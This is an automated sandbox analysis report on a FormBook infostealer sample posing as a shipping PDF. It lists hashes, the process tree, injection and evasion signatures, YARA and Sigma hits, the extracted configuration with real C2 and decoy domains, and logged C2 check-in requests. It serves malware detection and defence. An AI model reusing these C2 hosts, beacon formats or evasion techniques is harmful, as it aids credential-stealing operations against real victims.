Loading ...

Play interactive tourEdit tour

Windows Analysis Report Original Shipment Doc Ref 2853801324189923,PDF.exe

Overview

General Information

Sample Name:Original Shipment Doc Ref 2853801324189923,PDF.exe
Analysis ID:502359
MD5:e954c3d029b943b054fceb27e5e24d2d
SHA1:927f6633500965f008ab556a0c1004c095e004ee
SHA256:a0703367806de16bac9c75c016780c0bf3b1d8c21cf7f51b6a47b6a1aba74999
Tags:exeXloader
Infos:

Most interesting Screenshot:

Detection

DBatLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Original Shipment Doc Ref 2853801324189923,PDF.exe (PID: 5904 cmdline: 'C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe' MD5: E954C3D029B943B054FCEB27E5E24D2D)
    • Original Shipment Doc Ref 2853801324189923,PDF.exe (PID: 6648 cmdline: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe MD5: E954C3D029B943B054FCEB27E5E24D2D)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Nyedvqj.exe (PID: 6824 cmdline: 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe' MD5: E954C3D029B943B054FCEB27E5E24D2D)
          • Nyedvqj.exe (PID: 4724 cmdline: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe MD5: E954C3D029B943B054FCEB27E5E24D2D)
        • svchost.exe (PID: 1496 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • netsh.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • cmmon32.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • Nyedvqj.exe (PID: 6664 cmdline: 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe' MD5: E954C3D029B943B054FCEB27E5E24D2D)
    • Nyedvqj.exe (PID: 7128 cmdline: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe MD5: E954C3D029B943B054FCEB27E5E24D2D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lnvietnam.online/epns/"], "decoy": ["mmfaccao.com", "blttsperma.quest", "946abe.net", "indispensablehands.com", "jkformationfrance.com", "phonerepaire.com", "lienquan-trian.com", "youkuti.com", "empowermindbodystudios.com", "seunicapf.com", "fk-link.xyz", "kunai.tech", "difficultbutdoablebrand.com", "ejworkspace.com", "teracorp.biz", "thekids.today", "quintaalentejana.com", "annaviruksham.com", "jshengrong.com", "nsmetalmakina.xyz", "hentainftd.com", "alphabet-chicken-farms.com", "erotikchat.red", "skintipsllc.com", "expressofertachegou.com", "ygraeriotexniki.com", "thesidehustler.net", "visionries.com", "deployinghigh.com", "havana-smile.com", "exclusivegift7.com", "ephraimhomedeals.com", "westquartier.com", "kiingear.com", "officecom-myaccount.com", "lemomentconcept.com", "royalteacherclass.com", "alltart.com", "hustlershandbook.biz", "mxpvlv.biz", "canalcorporate.com", "carcity.toys", "k6tkuwrnjake.biz", "acrobike69.com", "4000518883.com", "katia-magnetisme.com", "shiningproent.com", "ikmbc-b02.com", "thoughtsbig.com", "baba.clinic", "blazestead.com", "12monthmillionairetraining.com", "goodtasteonline.com", "nokushop.com", "teneses.com", "215oldtoby.com", "pampelina.com", "eimzaizmir.com", "newnetteline.com", "discovertexasbeaches.com", "farrukhportfolio.website", "bombers.xyz", "melissacarbonell.group", "5402506.win"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Original Shipment Doc Ref 2853801324189923,PDF.exeSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x79074:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\jqvdeyN.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x79074:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.321929561.0000000000473000.00000008.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x8074:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000003.270904610.0000000003C8C000.00000004.00000001.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x79080:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
    Click to see the 104 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
      • 0x15dec:$sqlite3step: 68 34 1C 7B E1
      • 0x15d08:$sqlite3text: 68 38 2A 90 C5
      • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
      • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
      17.1.Nyedvqj.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.1.Nyedvqj.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 40 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Suspect Svchost ActivityShow sources
        Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1496
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe' , CommandLine: 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, NewProcessName: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, OriginalFileName: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe' , ProcessId: 6824
        Sigma detected: Suspicious Svchost ProcessShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1496
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1496

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lnvietnam.online/epns/"], "decoy": ["mmfaccao.com", "blttsperma.quest", "946abe.net", "indispensablehands.com", "jkformationfrance.com", "phonerepaire.com", "lienquan-trian.com", "youkuti.com", "empowermindbodystudios.com", "seunicapf.com", "fk-link.xyz", "kunai.tech", "difficultbutdoablebrand.com", "ejworkspace.com", "teracorp.biz", "thekids.today", "quintaalentejana.com", "annaviruksham.com", "jshengrong.com", "nsmetalmakina.xyz", "hentainftd.com", "alphabet-chicken-farms.com", "erotikchat.red", "skintipsllc.com", "expressofertachegou.com", "ygraeriotexniki.com", "thesidehustler.net", "visionries.com", "deployinghigh.com", "havana-smile.com", "exclusivegift7.com", "ephraimhomedeals.com", "westquartier.com", "kiingear.com", "officecom-myaccount.com", "lemomentconcept.com", "royalteacherclass.com", "alltart.com", "hustlershandbook.biz", "mxpvlv.biz", "canalcorporate.com", "carcity.toys", "k6tkuwrnjake.biz", "acrobike69.com", "4000518883.com", "katia-magnetisme.com", "shiningproent.com", "ikmbc-b02.com", "thoughtsbig.com", "baba.clinic", "blazestead.com", "12monthmillionairetraining.com", "goodtasteonline.com", "nokushop.com", "teneses.com", "215oldtoby.com", "pampelina.com", "eimzaizmir.com", "newnetteline.com", "discovertexasbeaches.com", "farrukhportfolio.website", "bombers.xyz", "melissacarbonell.group", "5402506.win"]}
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeAvira: detection malicious, Label: HEUR/AGEN.1103161
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 18.2.Nyedvqj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 17.2.Nyedvqj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 18.1.Nyedvqj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 17.1.Nyedvqj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2
        Source: Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
        Source: Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
        Source: Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
        Source: Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
        Source: Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
        Source: Binary string: wntdll.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, Nyedvqj.exe, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
        Source: Binary string: svchost.pdb source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
        Source: Binary string: svchost.pdbUGP source: Nyedvqj.exe, 00000011.00000002.375953797.0000000000940000.00000040.00020000.sdmp
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 4x nop then pop esi
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 4x nop then pop edi
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 4x nop then pop ebx
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 4x nop then pop edi
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 4x nop then pop esi
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 4x nop then pop edi
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 4x nop then pop ebx
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 4x nop then pop edi

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 35.209.104.90:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49809 -> 34.102.136.180:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.goodtasteonline.com
        Source: C:\Windows\explorer.exeDomain query: www.thesidehustler.net
        Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
        Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
        Source: C:\Windows\explorer.exeDomain query: www.mmfaccao.com
        Source: C:\Windows\explorer.exeDomain query: www.lnvietnam.online
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
        Source: C:\Windows\explorer.exeNetwork Connect: 35.209.104.90 80
        Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
        Source: C:\Windows\explorer.exeDomain query: www.blttsperma.quest
        Source: C:\Windows\explorer.exeDomain query: www.bombers.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeDomain query: www.jkformationfrance.com
        Source: C:\Windows\explorer.exeDomain query: www.alltart.com
        Performs DNS queries to domains with low reputationShow sources
        Source: C:\Windows\explorer.exeDNS query: www.bombers.xyz
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.lnvietnam.online/epns/
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
